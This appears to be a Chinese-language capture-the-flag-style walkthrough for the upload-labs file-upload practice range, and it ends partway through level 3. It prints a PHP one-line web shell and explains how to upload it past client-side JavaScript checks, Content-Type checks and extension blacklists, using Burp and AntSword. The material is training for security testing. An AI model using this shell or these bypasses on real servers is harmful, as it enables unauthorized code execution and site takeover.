下载地址
https://github.com/c0ny1/upload-labs
Level 1
第一关没什么可说的JS前端过滤。
方法一
首先构造一句话木马。
<?php @eval($_POST['a']);?>
用谷歌浏览器,设置禁用JavaScript 然后直接上传.php木马文件。
上传成功后复制图片地址,用蚁剑成功连接木马。
方法二
把php后缀改成jpg格式,然后打开Burp开启截断,点击上传,让截取数据包中的jpg格式再改回php格式即可。
Level 2
第二关已经换成了后端过滤再禁用JavaScript已经没有用处了,首先看分析第二关的代码,后端条件判断的地方限制了上传文件的Content-Type只能是jpeg,png,gif三种形式其中之一。这里是没对后缀做任何判断的所以说我们可以直接上传php格式文件,但是需要利用burp抓包去修改文件的Content-Type进行绕过。
Level 3
第三关的话黑名单绕过,代码里过滤了.asp,.aspx,.php,.jsp,但是可以利用别名绕过,比如php5…等等,但是前提是apache配置文件中要有这一行才行,自己去配置文件加一下吧,这就不做演示了,我懒。
AddType application/x